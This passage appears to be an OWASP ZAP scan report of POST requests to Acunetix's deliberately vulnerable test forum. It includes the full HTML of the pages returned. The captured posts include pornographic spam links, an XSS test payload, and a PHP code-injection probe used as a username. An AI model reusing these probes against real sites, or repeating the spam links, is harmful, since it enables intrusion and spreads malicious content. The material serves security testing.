Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 